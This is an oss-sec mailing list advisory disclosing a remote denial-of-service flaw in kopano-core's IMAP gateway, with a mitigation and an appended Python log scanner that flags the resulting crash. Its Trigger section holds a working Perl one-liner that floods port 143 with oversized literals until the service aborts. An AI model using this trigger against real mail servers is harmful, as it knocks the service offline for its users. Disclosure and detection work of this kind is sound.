oss-sec mailing list archives

kopano-core 11.0.1.143: Remote DoS with resource exhaustion


From: Jan Engelhardt <jengelh () inai de>
Date: Sat, 1 May 2021 17:07:37 +0200 (CEST)


To the best of my knowledge, this is the initial publication,
and there is no CVE number as of this time.


# Affected versions

  * kopano-core 8.5 to 11.0.1.143

The "kopano-gateway" program implements a network service for IMAP.
By default, a generous buffer is allocated for string literals, so
the service can be triggered to go into an out-of-memory condition.
OOM appears to be handled (log msg with "Cannot allocate memory"),
but not _consistently_, letting std::bad_alloc escape somewhere,
terminating the process and denying further access to the service.


# Trigger

» ./kopano-gateway -F &
» perl -MIO::Socket::INET -e 
  '$a="A"x65536;for(1..99){$s=IO::Socket::INET->new(PeerHost,"localhost",PeerPort,143);
  $s->write("K {134217727}\r\n");$s->write($a) for 1..2048;push@k,$s;}'

2021-05-01T17:00:03.424598: [error  ] Failed to read line: Cannot allocate memory
2021-05-01T17:00:40.489165: [crit   ] ----------------------------------------------------------------------
2021-05-01T17:00:40.489174: [crit   ] Fatal error detected. Please report all following information.
2021-05-01T17:00:40.489186: [crit   ] kopano-dagent 11.0.1
2021-05-01T17:00:40.489210: [crit   ] OS: openSUSE Tumbleweed (Linux 5.12.0-3.g6208a83-default x86_64)
2021-05-01T17:00:40.489217: [crit   ] Thread name: kopano-gateway
2021-05-01T17:00:40.489429: [crit   ] Peak RSS: 3056660
2021-05-01T17:00:40.489444: [crit   ] Pid 31604 caught SIGABRT (6), out of memory or unhandled exception, traceback:
terminate called after throwing an instance of 'std::bad_alloc'
  what():  std::bad_alloc


# Mitigation

A reduction of the buffer (gateway.cfg:imap_max_messagesize) is 
possible, but this administrative action equally implies a reduction of 
the service capabilities offered to end-users (and may be unpopular).
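
A log check a defender could run for the crash signature shown in the
Trigger excerpt (added example, not part of the original post or of
kopano-core). The sample lines are a subset of that excerpt; the function
names and the five-minute correlation window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Sample input: a subset of the log lines in the advisory's excerpt.
SAMPLE = """\
2021-05-01T17:00:03.424598: [error  ] Failed to read line: Cannot allocate memory
2021-05-01T17:00:40.489217: [crit   ] Thread name: kopano-gateway
2021-05-01T17:00:40.489429: [crit   ] Peak RSS: 3056660
2021-05-01T17:00:40.489444: [crit   ] Pid 31604 caught SIGABRT (6), out of memory or unhandled exception, traceback:
terminate called after throwing an instance of 'std::bad_alloc'
"""

# Layout seen in the excerpt: "<timestamp>: [<level>  ] <message>"
LINE = re.compile(r"^(?P<ts>\S+): \[(?P<level>\w+)\s*\] (?P<msg>.*)$")
OOM_READ = "Failed to read line: Cannot allocate memory"
FIELDS = {  # crit-block fields collected until the SIGABRT line closes it
    "thread": re.compile(r"Thread name: (\S+)"),
    "peak_rss": re.compile(r"Peak RSS: (\d+)"),
}
CRASH = re.compile(r"Pid (\d+) caught SIGABRT")

def scan(lines):
    """Return (timestamps of OOM read errors, crash records)."""
    oom_reads, crashes, ctx = [], [], {}
    for raw in lines:
        m = LINE.match(raw.rstrip("\n"))
        if not m:
            continue  # raw stderr such as "terminate called ..."
        ts, level, msg = m["ts"], m["level"], m["msg"]
        if level == "error" and OOM_READ in msg:
            oom_reads.append(ts)
        elif level == "crit":
            for key, rx in FIELDS.items():
                if (f := rx.search(msg)):
                    ctx[key] = f[1]
            if (c := CRASH.search(msg)):
                crashes.append({"ts": ts, "pid": int(c[1]), **ctx})
                ctx = {}
    return oom_reads, crashes

def suspicious_crashes(lines, window=timedelta(minutes=5)):
    """Crashes preceded by an OOM read error within `window` (assumed value)."""
    oom_reads, crashes = scan(lines)
    ooms = [datetime.fromisoformat(o) for o in oom_reads]
    return [c for c in crashes
            if any(timedelta(0) <= datetime.fromisoformat(c["ts"]) - o <= window
                   for o in ooms)]
```

Feeding the gateway log through suspicious_crashes() separates aborts that
follow a failed literal read from unrelated crashes.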

